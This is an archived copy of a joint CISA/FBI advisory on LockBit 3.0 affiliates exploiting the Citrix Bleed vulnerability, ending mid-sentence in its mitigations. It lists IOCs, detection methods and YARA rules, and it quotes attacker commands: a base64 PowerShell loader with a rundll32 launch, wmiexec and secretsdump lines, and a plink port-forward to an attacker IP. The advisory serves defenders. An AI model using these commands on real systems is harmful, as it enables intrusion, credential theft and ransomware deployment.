{
	"id": "39aa14dc-48a3-4b1e-a1a7-cf83546c9757",
	"created_at": "2026-04-06T00:18:50.670144Z",
	"updated_at": "2026-04-10T13:11:51.074594Z",
	"deleted_at": null,
	"sha1_hash": "4f215e3c3c76b89ae5dc602b1ded57d8fd0321b9",
	"title": "#StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 204804,
	"plain_text": "#StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE\r\n2023-4966 Citrix Bleed Vulnerability | CISA\r\nPublished: 2023-11-21 · Archived: 2026-04-06 00:04:42 UTC\r\nSUMMARY\r\nNote: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for\r\nnetwork defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware\r\nadvisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of\r\ncompromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all\r\n#StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.\r\nThe Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State\r\nInformation Sharing \u0026 Analysis Center (MS-ISAC), and Australian Signals Directorate’s Australian Cyber Security Centre\r\n(ASD’s ACSC) are releasing this joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods\r\nassociated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web\r\napplication delivery control (ADC) and NetScaler Gateway appliances.\r\nThis CSA provides TTPs and IOCs obtained from FBI, ACSC, and voluntarily shared by Boeing. Boeing observed LockBit\r\n3.0 affiliates exploiting CVE-2023-4966, to obtain initial access to Boeing Distribution Inc., its parts and distribution\r\nbusiness that maintains a separate environment. Other trusted third parties have observed similar activity impacting their\r\norganization.\r\nHistorically, LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical\r\ninfrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency\r\nservices, healthcare, manufacturing, and transportation. Observed TTPs for LockBit ransomware attacks can vary\r\nsignificantly in observed TTPs.\r\nCitrix Bleed, known to be leveraged by LockBit 3.0 affiliates, allows threat actors to bypass password requirements and\r\nmultifactor authentication (MFA), leading to successful session hijacking of legitimate user sessions on Citrix NetScaler\r\nweb application delivery control (ADC) and Gateway appliances. Through the takeover of legitimate user sessions,\r\nmalicious actors acquire elevated permissions to harvest credentials, move laterally, and access data and resources.\r\nCISA and the authoring organizations strongly encourage network administrators to apply the mitigations found in this CSA,\r\nwhich include isolating NetScaler ADC and Gateway appliances and applying necessary software updates through the Citrix\r\nKnowledge Center .\r\nThe authoring organizations encourage network defenders to hunt for malicious activity on their networks using the\r\ndetection methods and IOCs within this CSA. If a potential compromise is detected, organizations should apply the incident\r\nresponse recommendations. If no compromise is detected, organizations should immediately apply patches made publicly\r\navailable.\r\nFor the associated Malware Analysis Report (MAR), see: MAR-10478915-1.v1 Citrix Bleed\r\nDownload the PDF version of this report:\r\nFor a downloadable copy of IOCs, see:\r\nTECHNICAL DETAILS\r\nNote: This advisory uses the MITRE ATT\u0026CK® for Enterprise framework, version 14. See the MITRE ATT\u0026CK Tactics\r\nand Techniques section for a table of the threat actors’ activity mapped to MITRE ATT\u0026CK tactics and techniques. For\r\nassistance with mapping malicious cyber activity to the MITRE ATT\u0026CK framework, see CISA and MITRE ATT\u0026CK’s Best\r\nPractices for MITRE ATT\u0026CK Mapping and CISA’s Decider Tool .\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nPage 1 of 14\n\nCVE-2023-4966\r\nCVE-2023-4966 is a software vulnerability found in Citrix NetScaler ADC and NetScaler Gateway appliances with\r\nexploitation activity identified as early as August 2023. This vulnerability provides threat actors, including LockBit 3.0\r\nransomware affiliates, the capability to bypass MFA [T1556.006 ] and hijack legitimate user sessions [T1563 ].\r\nAfter acquiring access to valid cookies, LockBit 3.0 affiliates establish an authenticated session within the NetScaler\r\nappliance without a username, password, or access to MFA tokens [T1539 ]. Affiliates acquire this by sending an HTTP\r\nGET request with a crafted HTTP Host header, leading to a vulnerable appliance returning system memory information\r\n[T1082 ]. The information obtained through this exploit contains a valid NetScaler AAA session cookie.\r\nCitrix publicly disclosed CVE-2023-4966 on Oct. 10, 2023, within their Citrix Security Bulletin , which issued guidance,\r\nand detailed the affected products, IOCs, and recommendations. Based on widely available public exploits and evidence of\r\nactive exploitation, CISA added this vulnerability to the Known Exploited Vulnerabilities (KEVs) Catalog. This critical\r\nvulnerability exploit impacts the following software versions [1 ]:\r\nNetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50\r\nNetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15\r\nNetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19\r\nNetScaler ADC and NetScaler Gateway version 12.1 (EOL)\r\nNetScaler ADC 13.1FIPS before 13.1-37.163\r\nNetScaler ADC 12.1-FIPS before 12.1-55.300\r\nNetScaler ADC 12.1-NDcPP before 12.1-55.300\r\nDue to the ease of exploitation, CISA and the authoring organizations expect to see widespread exploitation of the Citrix\r\nvulnerability in unpatched software services throughout both private and public networks.\r\nThreat Actor Activity\r\nMalware identified in this campaign is generated beginning with the execution of a PowerShell script ( 123.ps1 ) which\r\nconcatenates two base64 strings together, converts them to bytes, and writes them to the designated file path.\r\n$y = \"TVqQAAMA...\u003clong base64 string\u003e\"\r\n$x = \"RyEHABFQ...\u003clong base64 string\u003e\"\r\n$filePath = \"C:\\Users\\Public\\adobelib.dll\"\r\n$fileBytes = [System.Convert]::FromBase64String($y + $x)\r\n[System.IO.File]::WriteAllBytes($filePath, $fileBytes)\r\nThe resulting file ( adobelib.dll ) is then executed by the PowerShell script using rundll32 .\r\nrundll32 C:\\Users\\Public\\adobelib.dll,main \u003c104 hex char key\u003e\r\nThe Dynamic Link Library (DLL) will not execute correctly without the 104 hex character key. Following execution, the\r\nDLL attempts to send a POST request to https://adobe-us-updatefiles[.]digital/index.php which resolves to IP addresses\r\n172.67.129[.]176 and 104.21.1[.]180 as of November 16, 2023. Although adobelib.dll and the adobe-us-updatefiles[.]digital\r\nhave the appearance of legitimacy, the file and domain have no association with legitimate Adobe software and no identified\r\ninteraction with the software.\r\nOther observed activities include the use of a variety of TTPs commonly associated with ransomware activity. For example,\r\nLockBit 3.0 affiliates have been observed using AnyDesk and Splashtop remote management and monitoring (RMM), Batch\r\nand PowerShell scripts, the execution of HTA files using the Windows native utility mshta.exe and other common software\r\ntools typically associated with ransomware incidents.\r\nINDICATORS OF COMPROMISE (IOCS)\r\nSee Table 1–Table 5 for IOCs related to Lockbit 3.0 affiliate exploitation of CVE-2023-4966.\r\n[Fidelity] Legend:\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nPage 2 of 14\n\nHigh = Indicator is unique or highly indicates LockBit in an environment.\r\nMedium = Indicator was used by LockBit but is used outside of LockBit activity, albeit rarely.\r\nLow = Indicates tools that are commonly used but were used by LockBit.\r\nLow confidence indicators may not be related to ransomware.\r\nDisclaimer: Some IP addresses in this CSA may be associated with legitimate activity. Organizations are encouraged to\r\ninvestigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed\r\nas malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.\r\nTable 1: LockBit 3.0 Affiliate Citrix Bleed Campaign\r\nIndicator Type Fidelity Description\r\n192.229.221[.]95 IP Low\r\nMag.dll calls out to this IP address. Ties back to dns0.org .\r\nShould run this DLL in a sandbox, when possible, to confirm C2. IP\r\nis shared hosting.\r\n123.ps1\r\nPowerShell\r\nscript\r\nHigh Creates and executes payload via script.\r\n193.201.9[.]224 IP High FTP to Russian geolocated IP from compromised system.\r\n62.233.50[.]25 IP High\r\nRussian geolocated IP from compromised system.\r\nHxxp://62.233.50[.]25/en-us/docs.html\r\nHxxp://62.233.50[.]25/en-us/test.html\r\n51.91.79[.].17 IP Med Temp.sh IP.\r\nTeamviewer\r\nTool (Remote\r\nAdmin)\r\nLow  \r\n70.37.82[.]20 IP Low\r\nIP was seen from a known compromised account reaching out to an\r\nAltera IP address. LockBit is known to leverage Altera, a remote\r\nadmin tool, such as Anydesk, team viewer, etc.\r\n185.17.40[.]178 IP Low\r\nTeamviewer C2, ties back to a polish service provider, Artnet Sp.\r\nZo.o. Polish IP address.\r\nTable 2: LockBit 3.0 Affiliate Citrix Bleed Campaign\r\nIndicator Type Fidelity Description\r\n185.229.191.41\r\nAnydesk\r\nUsage\r\nHigh Anydesk C2.\r\n81.19.135[.]219 IP High\r\nRussian geolocated IP hxxp://81.19.135[.]219/F8PtZ87fE8dJWqe.hta\r\nHxxp://81.19.135[.]219:443/q0X5wzEh6P7.hta\r\n45.129.137[.]233 IP Medium\r\nCallouts from known compromised device beginning during the\r\ncompromised window.\r\n185.229.191[.]41\r\nAnydesk\r\nUsage\r\nHigh Anydesk C2.\r\nPlink.exe Command\r\ninterpreter\r\nHigh Plink (PuTTY Link) is a command-line connection tool, similar to UNIX\r\nSSH. It is mostly used for automated operations, such as making CVS access\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nPage 3 of 14\n\nIndicator Type Fidelity Description\r\na repository on a remote server. Plink can be used to automate SSH actions\r\nand for remote SSH tunneling on Windows.\r\nAnyDeskMSI.exe\r\nRemote\r\nadmin\r\ntool\r\nHigh\r\nWe do see that AnyDeskMSI.exe was installed as a service with “auto start”\r\nabilities for persistence. Config file from the image could be leveraged to find\r\nthe ID and Connection IP, but we do not have that currently.\r\nSRUtility.exe\r\nSplashtop\r\nutility\r\n  9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30a\r\nNetscan exe\r\nNetwork\r\nscanning\r\nsoftware\r\nHigh 498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155\r\nTable 3: LockBit 3.0 Affiliate Citrix Bleed Campaign\r\nIndicator Type Fidelity Description\r\nScheduled task:\r\n\\MEGA\\MEGAcmd\r\nPersistence High  \r\nScheduled task:\r\nUpdateAdobeTask\r\nPersistence High  \r\nMag.dll Persistence High\r\nIdentified as running within UpdateAdobeTask\r\ncc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc\r\n123.ps1 Script High\r\nCreates rundll32 C:\\Users\\Public\\adobelib.dll,main\r\ned5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a\r\nAdobelib.dll Persistence Low C2 from adobelib.dll .\r\nAdobe-us-updatefiles[.]digital\r\nTool\r\nDownload\r\nHigh Used to download obfuscated toolsets.\r\n172.67.129[.]176\r\nTool\r\nDownload\r\nHigh IP of adobe-us-updatefiles[.]digital.\r\n104.21.1[.]180\r\nTool\r\nDownload\r\nHigh Adobe-us-updatefiles[.]digital.\r\ncmd.exe /q /c cd 1\u003e\r\n\\\\127.0.0.1\\admin$\\__1698617793[.]44\r\n2\u003e\u00261\r\nCommand High wmiexec.exe usage\r\ncmd.exe /q /c cd \\ 1\u003e\r\n\\\\127.0.0.1\\admin$\\__1698617793[.]44\r\n2\u003e\u00261\r\nCommand High wmiexec.exe usage\r\ncmd.exe /q /c query user 1\u003e\r\n\\\\127.0.0.1\\admin$\\__1698617793[.]44\r\n2\u003e\u00261\r\nCommand High wmiexec.exe usage\r\ncmd.exe /q /c taskkill /f /im\r\nsqlwriter.exe /im winmysqladmin.exe\r\nCommand High wmiexec.exe usage\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nPage 4 of 14\n\nIndicator Type Fidelity Description\r\n/im w3sqlmgr.exe /im sqlwb.exe /im\r\nsqltob.exe /im sqlservr.exe /im\r\nsqlserver.exe /im sqlscan.exe /im\r\nsqlbrowser.exe /im sqlrep.exe /im\r\nsqlmangr.exe /im sqlexp3.exe /im\r\nsqlexp2.exe /im sqlex\r\ncmd.exe /q /c cd \\ 1\u003e\r\n\\\\127.0.0.1\\admin$\\__1698618133[.]54\r\n2\u003e\u00261\r\nCommand High wmiexec.exe usage\r\nThe authoring organizations recommended monitoring/reviewing traffic to the 81.19.135[.]* class C network and review\r\nfor MSHTA being called with HTTP arguments [2 ].\r\nTable 4: LockBit 3.0 Affiliate Citrix Bleed Campaign\r\nIndicator Type Fidelity Description Notes\r\n81.19.135[.]219 IP High\r\nRussian geolocated IP used by user to request mshta\r\nwith http arguments to download random named HTA\r\nfile named q0X5wzzEh6P7.hta\r\n \r\n81.19.135[.]220 IP High Russian geolocated IP, seen outbound in logs\r\nIP registered to a\r\nSouth African\r\nCompany\r\n81.19.135[.]226 IP High Russian geolocated IP, seen outbound in logs\r\nIP registered to a\r\nSouth African\r\nCompany\r\nTable 5: Citrix Bleed Indicators of Compromise (IOCs)\r\nType Indicator Description\r\nFilename c:\\users\\\u003cusername\u003e\\downloads\\process hacker 2\\peview.exe Process hacker\r\nFilename c:\\users\\\u003cusername\u003e\\music\\process hacker 2\\processhacker.exe Process hacker\r\nFilename psexesvc.exe Psexec service excutable\r\nFilename c:\\perflogs\\processhacker.exe Process hacker\r\nFilename c:\\windows\\temp\\screenconnect\\23.8.5.8707\\files\\processhacker.exe\r\nProcess hacker\r\ntransferred via\r\nscreenconnect\r\nFilename c:\\perflogs\\lsass.dmp Lsass dump\r\nFilename c:\\users\\\u003cusername\u003e\\downloads\\mimikatz.exe Mimikatz\r\nFilename c:\\users\\\u003cusername\u003e\\desktop\\proc64\\proc.exe Procdump\r\nFilename c:\\users\\\u003cusername\u003e\\documents\\veeam-get-creds.ps1 Decrypt veeam creds\r\nFilename secretsdump.py\r\nImpacket installed on\r\nazure vm\r\nCmdline secretsdump.py \u003cdomain\u003e/\u003cusername\u003e@\u003cip\u003e -outputfile 1\r\nImpacket installed on\r\nazure vm\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nPage 5 of 14\n\nType Indicator Description\r\nFilename ad.ps1\r\nAdrecon found in\r\npowershell transcripts\r\nFilename c:\\perflogs\\64-bit\\netscan.exe Softperfect netscan\r\nFilename tniwinagent.exe\r\nTotal network inventory\r\nagent\r\nFilename psexec.exe\r\nPsexec used to deploy\r\nscreenconnect\r\nFilename 7z.exe Used to compress files\r\nTool Action1 RMM\r\nTool Atera RMM\r\ntool anydesk rmm\r\ntool fixme it rmm\r\ntool screenconnect rmm\r\ntool splashtop rmm\r\ntool zoho assist rmm\r\nipv4 101.97.36[.]61 zoho assist\r\nipv4 168.100.9[.]137 ssh portforwarding infra\r\nipv4 185.20.209[.]127 zoho assist\r\nipv4 185.230.212[.]83 zoho assist\r\nipv4 206.188.197[.]22\r\npowershell reverse shell\r\nseen in powershell\r\nlogging\r\nipv4 54.84.248[.]205 fixme ip\r\nIpv4 141.98.9[.]137\r\nRemote IP for\r\nCitrixBleed\r\ndomain assist.zoho.eu zoho assist\r\nfilename c:\\perflogs\\1.exe connectwise renamed\r\nfilename c:\\perflogs\\run.exe\r\nscreenconnect pushed\r\nby psexec\r\nfilename c:\\perflogs\\64-bit\\m.exe connectwise renamed\r\nfilename c:\\perflogs\\64-bit\\m0.exe connectwise renamed\r\nfilename c:\\perflogs\\za_access_my_department.exe zoho remote assist\r\nfilename c:\\users\\\u003cusername\u003e\\music\\za_access_my_department.exe zoho remote assist\r\nfilename c:\\windows\\servicehost.exe plink renamed\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nPage 6 of 14\n\nType Indicator Description\r\nfilename c:\\windows\\sysconf.bat\r\nruns servicehost.exe\r\n(plink) command\r\nfilename c:\\windows\\temp\\screenconnect\\23.8.5.8707\\files\\azure.msi\r\nzoho remote assist used\r\nto transfer data via\r\nscreenconnect\r\ncmdline\r\necho enter | c:\\windows\\servicehost.exe -ssh -r 8085:127.0.0.1:8085\r\n\u003cusername\u003e@168.100.9[.]137 -pw \u003cpassword\u003e\r\nplink port forwarding\r\ndomain eu1-dms.zoho[.]eu zoho assist\r\ndomain fixme[.]it fixme it\r\ndomain unattended.techinline[.]net fixme it\r\nMITRE ATT\u0026CK TACTICS AND TECHNIQUES\r\nSee Table 6 and Table 7 for all referenced threat actor tactics and techniques in this advisory.\r\nTable 6: ATT\u0026CK Techniques for Enterprise: Discovery\r\nTechnique Title ID Use\r\nSystem Information\r\nDiscovery\r\nT1082 Threat actors will attempt to obtain information about the operating system and\r\nhardware, including versions, and patches.\r\nTable 7: ATT\u0026CK Techniques for Enterprise: Credential Access\r\nTechnique Title ID Use\r\nModify Authentication\r\nProcess: Multifactor\r\nAuthentication\r\nT1556.006\r\nThreat actors leverage vulnerabilities found within CVE- to compromise,\r\nmodify, and/or bypass multifactor authentication to hijack user sessions,\r\nharvest credentials, and move laterally, which enables persistent access.\r\nSteal Web Session Cookie T1539\r\nThreat actors with access to valid cookies can establish an authenticated\r\nsession within the NetScaler appliance without a username, password, or\r\naccess to multifactor authentication (MFA) tokens.\r\nDETECTION METHODS\r\nHunting Guidance\r\nNetwork defenders should prioritize observing users in session when hunting for network anomalies. This will aid the hunt\r\nfor suspicious activity such as installing tools on the system (e.g., putty, rClone ), new account creation, log item failure, or\r\nrunning commands such as hostname, quser, whoami, net, and taskkill. Rotating credentials for identities provisioned for\r\naccessing resources via a vulnerable NetScaler ADC or Gateway appliance can also aid in detection.\r\nFor IP addresses:\r\nIdentify if NetScaler logs the change in IP.\r\nIdentify if users are logging in from geolocations uncommon for your organization’s user base.\r\nIf logging VPN authentication, identify if users are associated with two or more public IP addresses while in a\r\ndifferent subnet or geographically dispersed.\r\nNote: MFA to NetScaler will not operate as intended due to the attacker bypassing authentication by providing a\r\ntoken/session for an already authenticated user.\r\nThe following procedures can help identify potential exploitation of CVE-2023-4966 and LockBit 3.0 activity:\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nPage 7 of 14\n\nSearch for filenames that contain tf0gYx2YI for identifying LockBit encrypted files.\r\nLockBit 3.0 actors were seen using the C:\\Temp directory for loading and the execution of files.\r\nInvestigate requests to the HTTP/S endpoint from WAF.\r\nHunt for suspicious login patterns from NetScaler logs\r\nHunt for suspicious virtual desktop agent Windows Registry keys\r\nAnalyze memory core dump files.\r\nBelow, are CISA developed YARA rules and an open-source rule that may be used to detect malicious activity in the Citrix\r\nNetScaler ADC and Gateway software environment. For more information on detecting suspicious activity within NetScaler\r\nlogs or additional resources, visit CISA’s Malware Analysis Report (MAR) MAR-10478915-1.v1 Citrix Bleed or the\r\nresource section of this CSA [3 ]:\r\nYARA Rules\r\nCISA received four files for analysis that show files being used to save registry hives, dump the Local Security Authority\r\nSubsystem Service (LSASS) process memory to disk, and attempt to establish sessions via Windows Remote Management\r\n(WinRM). The files include:\r\nWindows Batch file (.bat)\r\nWindows Executable (.exe)\r\nWindows Dynamic Link Library (.dll)\r\nPython Script (.py)\r\nrule CISA_10478915_01 : trojan installs_other_components\r\n{\r\nmeta:\r\nauthor = \"CISA Code \u0026 Media Analysis\"\r\nincident = \"10478915\"\r\ndate = \"2023-11-06\"\r\nlast_modified = \"20231108_1500\"\r\nactor = \"n/a\"\r\nfamily = \"n/a\"\r\ncapabilities = \"installs-other-components\"\r\nmalware_Type = \"trojan\"\r\ntool_type = \"information-gathering\"\r\ndescription = \"Detects trojan .bat samples\"\r\nsha256 = \"98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9\"\r\nstrings:\r\n$s1 = { 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 7a 2e 74 78 74 }\r\n$s2 = { 72 65 67 20 73 61 76 65 20 68 6b 6c 6d 5c 73 79 73 74 65 6d 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61\r\n73 6b 73\r\n5c 65 6d }\r\n$s3 = { 6d 61 6b 65 63 61 62 20 63 3a 5c 75 73 65 72 73 5c 70 75 62 6c 69 63 5c 61 2e 70 6e 67 20 63 3a 5c 77\r\n69 6e 64\r\n6f 77 73 5c 74 61 73 6b 73 5c 61 2e 63 61 62 }\r\ncondition:\r\nall of them\r\n}\r\nThis file is a Windows batch file called a.bat that is used to execute the file called a.exe with the file called a.dll as an\r\nargument. The output is printed to a file named 'z.txt' located in the path C:\\Windows\\Tasks. Next, a.bat pings the loop back\r\ninternet protocol (IP) address 127.0.0[.]1 three times.\r\nThe next command it runs is reg save to save the HKLM\\SYSTEM registry hive into the C:\\Windows\\tasks\\em directory.\r\nAgain, a.bat pings the loop back address 127.0.0[.]1 one time before executing another reg save command and saves the\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nPage 8 of 14\n\nHKLM\\SAM registry hive into the C:\\Windows\\Task\\am directory. Next, a.bat runs three makecab commands to create\r\nthree cabinet (.cab) files from the previously mentioned saved registry hives and one file named C:\\Users\\Public\\a.png. The\r\nnames of the .cab files are as follows:\r\nc:\\windows\\tasks\\em.cab\r\nc:\\windows\\tasks\\am.cab\r\nc:\\windows\\tasks\\a.cab\r\nrule CISA_10478915_02 : trojan installs_other_components\r\n{\r\nmeta:\r\nauthor = \"CISA Code \u0026 Media Analysis\"\r\nincident = \"10478915\"\r\ndate = \"2023-11-06\"\r\nlast_modified = \"20231108_1500\"\r\nactor = \"n/a\"\r\nfamily = \"n/a\"\r\ncapabilities = \"installs-other-components\"\r\nmalware_type = \"trojan\"\r\ntool_type = \"unknown\"\r\ndescription = \"Detects trojan PE32 samples\"\r\nsha256 = \"e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068\"\r\nstrings:\r\n$s1 = { 57 72 69 74 65 46 69 6c 65 }\r\n$s2 = { 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68\r\n6f 64 }\r\n$s3 = { 6f 70 65 72 61 74 6f 72 20 63 6f 5f 61 77 61 69 74 }\r\n$s4 = { 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72 }\r\n$s5 = { 64 65 6c 65 74 65 5b 5d }\r\n$s6 = { 4e 41 4e 28 49 4e 44 29 }\r\ncondition:\r\nuint16(0) == 0x5a4d and pe.imphash() == \"6e8ca501c45a9b85fff2378cffaa24b2\" and pe.size_of_code == 84480 and\r\nall of\r\nthem\r\n}\r\nThis file is a 64-bit Windows command-line executable called a.exe that is executed by a.bat. This file issues the remote\r\nprocedure call (RPC) ncalrpc:[lsasspirpc] to the RPC end point to provide a file path to the LSASS on the infected machine.\r\nOnce the file path is returned, the malware loads the accompanying DLL file called a.dll into the running LSASS process. If\r\nthe DLL is correctly loaded, then the malware outputs the message \"[*]success\" in the console.\r\nrule CISA_10478915_03 : trojan steals_authentication_credentials credential_exploitation\r\n{\r\nmeta:\r\nauthor = \"CISA Code \u0026 Media Analysis\"\r\nincident = \"10478915\"\r\ndate = \"2023-11-06\"\r\nlast_modified = \"20231108_1500\"\r\nactor = \"n/a\"\r\nfamily = \"n/a\"\r\ncapabilities = \"steals-authentication-credentials\"\r\nmalware_type = \"trojan\"\r\ntool_type = \"credential-exploitation\"\r\ndescription = \"Detects trojan DLL samples\"\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nPage 9 of 14\n\nsha256 = \"17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994\"\r\nstrings:\r\n$s1 = { 64 65 6c 65 74 65 }\r\n$s2 = { 3c 2f 74 72 75 73 74 49 6e 66 6f 3e }\r\n$s3 = { 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 }\r\n$s4 = { 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 45 78 }\r\n$s5 = { 46 69 6e 64 46 69 72 73 74 46 69 6c 65 45 78 57 }\r\n$s6 = { 47 65 74 54 69 63 6b 43 6f 75 6e 74 }\r\ncondition:\r\nuint16(0) == 0x5a4d and pe.subsystem == pe.SUBSYSTEM_WINDOWS_CUI and pe.size_of_code == 56832 and all of\r\nthem\r\n}\r\nThis file is a 64-bit Windows DLL called a.dll that is executed by a.bat as a parameter for the file a.exe. The file a.exe loads\r\nthis file into the running LSASS process on the infected machine. The file a.dll calls the Windows API CreateFileW to\r\ncreate a file called a.png in the path C:\\Users\\Public.\r\nNext, a.dll loads DbgCore.dll then utilizes MiniDumpWriteDump function to dump LSASS process memory to disk. If\r\nsuccessful, the dumped process memory is written to a.png. Once this is complete, the file a.bat specifies that the file a.png\r\nis used to create the cabinet file called a.cab in the path C:\\Windows\\Tasks.\r\nrule CISA_10478915_04 : backdoor communicates_with_c2 remote_access\r\n{\r\nmeta:\r\nauthor = \"CISA Code \u0026 Media Analysis\"\r\nincident = \"10478915\"\r\ndate = \"2023-11-06\"\r\nlast_modified = \"20231108_1500\"\r\nactor = \"n/a\"\r\nfamily = \"n/a\"\r\ncapabilities = \"communicates-with-c2\"\r\nmalware_type = \"backdoor\"\r\ntool_type = \"remote-access\"\r\ndescription = \"Detects trojan python samples\"\r\nsha256 = \"906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6\"\r\nstrings:\r\n$s1 = { 70 6f 72 74 20 3d 20 34 34 33 20 69 66 20 22 68 74 74 70 73 22 }\r\n$s2 = { 6b 77 61 72 67 73 2e 67 65 74 28 22 68 61 73 68 70 61 73 73 77 64 22 29 3a }\r\n$s3 = { 77 69 6e 72 6d 2e 53 65 73 73 69 6f 6e 20 62 61 73 69 63 20 65 72 72 6f 72 }\r\n$s4 = { 57 69 6e 64 77 6f 73 63 6d 64 2e 72 75 6e 5f 63 6d 64 28 73 74 72 28 63 6d 64 29 29 }\r\ncondition:\r\nall of them\r\n}\r\nThis file is a Python script called a.py that attempts to leverage WinRM to establish a session. The script attempts to\r\nauthenticate to the remote machine using NT LAN Manager (NTLM) if the keyword \"hashpasswd\" is present. If the\r\nkeyword \"hashpasswd\" is not present, then the script attempts to authenticate using basic authentication. Once a WinRM\r\nsession is established with the remote machine, the script has the ability to execute command line arguments on the remote\r\nmachine. If there is no command specified, then a default command of “whoami” is run.\r\nOpen Source YARA Rule\r\nImport \"pe\"\r\nrule M_Hunting_Backdoor_FREEFIRE\r\n{\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nPage 10 of 14\n\nmeta: author = \"Mandiant\"\r\ndescription = \"This is a hunting rule to detect FREEFIRE samples using OP code sequences in getLastRecord\r\nmethod\"\r\nmd5 = \"eb842a9509dece779d138d2e6b0f6949\"\r\nmalware_family = \"FREEFIRE\"\r\nstrings: $s1 = { 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 25\r\n72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ??\r\n7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F\r\n?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? ??\r\n}\r\ncondition:\r\nuint16(0) == 0x5A4D\r\nand filesize \u003e= 5KB\r\nand pe.imports(\"mscoree.dll\")\r\nand all of them }\r\nINCIDENT RESPONSE\r\nOrganizations are encouraged to assess Citrix software and your systems for evidence of compromise, and to hunt for\r\nmalicious activity (see Additional Resources section).If compromise is suspected or detected, organizations should assume\r\nthat threat actors hold full administrative access and can perform all tasks associated with the web management software as\r\nwell as installing malicious code.\r\nIf a potential compromise is detected, organizations should:\r\n1. Quarantine or take offline potentially affected hosts.\r\n2. Reimage compromised hosts.\r\n3. Create new account credentials.\r\n4. Collect and review artifacts such as running processes/services, unusual authentications, and recent network\r\nconnections.\r\nNote: Removing malicious administrator accounts may not fully mitigate risk considering threat actors may\r\nhave established additional persistence mechanisms.\r\n5. Report the compromise to FBI Internet Crime Complaint Center (IC3) at IC3.gov, local FBI Field Office, or CISA\r\nvia the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov  or 1-844-Say-CISA).\r\nState, local, tribal, or territorial government (SLTT) entities can also report to MS-ISAC (SOC@cisecurity.org  or\r\n866-787-4722). If outside of the US, please contact your national cyber center.\r\nMITIGATIONS\r\nThese mitigations apply to all critical infrastructure organizations and network defenders using Citrix NetScaler ADC and\r\nGateway software. CISA and authoring organizations recommend that software manufacturers incorporate secure-by-design\r\nand -default principles and tactics into their software development practices to limit the impact of exploitation such as threat\r\nactors leveraging unpatched vulnerabilities within Citrix NetScaler appliances, which strengthens the security posture of\r\ntheir customers.\r\nFor more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.\r\nThe authoring organizations of this CSA recommend organizations implement the mitigations below to improve your\r\ncybersecurity posture on the basis of the threat actor activity and to reduce the risk of compromise associated with Citrix\r\nCVE 2023-4966 and LockBit 3.0 ransomware \u0026 ransomware affiliates. These mitigations align with the Cross-Sector\r\nCybersecurity performance goals (CPGs) developed by CISA and the National Institute of Standards and Technology\r\n(NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations\r\nimplement. CISA and 